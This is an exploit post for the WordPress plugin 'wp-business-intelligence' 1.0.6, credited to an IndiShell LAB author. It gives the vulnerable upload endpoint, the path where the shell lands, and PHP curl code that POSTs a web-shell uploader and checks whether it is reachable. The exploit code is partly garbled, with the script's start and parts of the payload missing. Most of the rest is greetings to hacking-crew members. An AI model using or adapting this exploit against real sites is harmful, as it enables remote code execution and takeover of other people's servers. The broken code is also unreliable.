############################################################################################## # Exploit Title : wordpress plugin "wp-business-intelligence" Remote code execution exploit # Exploit Author : Manish Kishan Tanwar # vendor Home : www.wpbusinessintelligence.com # Version Affected: 1.0.6 # Discovered At : IndiShell LAB (indishell.in aka indian cyber army) # Love to : zero cool,Team indishell,Hardeep Singh ############################################################################################## //////////////////////////////////// POC Remote code Execution //////////////////////////////////// this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters ($_GET[ 'name' ] and $HTTP_RAW_POST_DATA) there is no security check on these parameters and can be exploited by attacker vulnerable link http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/php-ofc-library/ofc_upload_image.php shell will be here http://127.0.0.1/wordpress/wp-content/plugins//wp-business-intelligence-lite//resources/open-flash-chart/tmp-upload-images/shell.php /////////////////////// /// exploit code //// /////////////////////// "; echo "

<3 INDISHELL=FTW <3

"; echo "    
"; if( isset($_POST[\'sut\']) ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo "upload done :D

"; } else { echo "Upload failed :P
"; } } ?>'; $link=$web; $target = trim($link.$file.$shell); $fshell=$link.$upshell; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $target); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r')) { echo "shell has been uploaded :D here is shell link
".$fshell.""; } else { echo "sorry :( "; } ?> ///////////////////// end of exploit code //////////////////// --==[[ Greetz To ]]==-- ############################################################################################################################################ Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen lovetherisk,brown suger and rest of TEAM INDISHELL ############################################################################################################################################ --==[[Love to]]==-- # My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)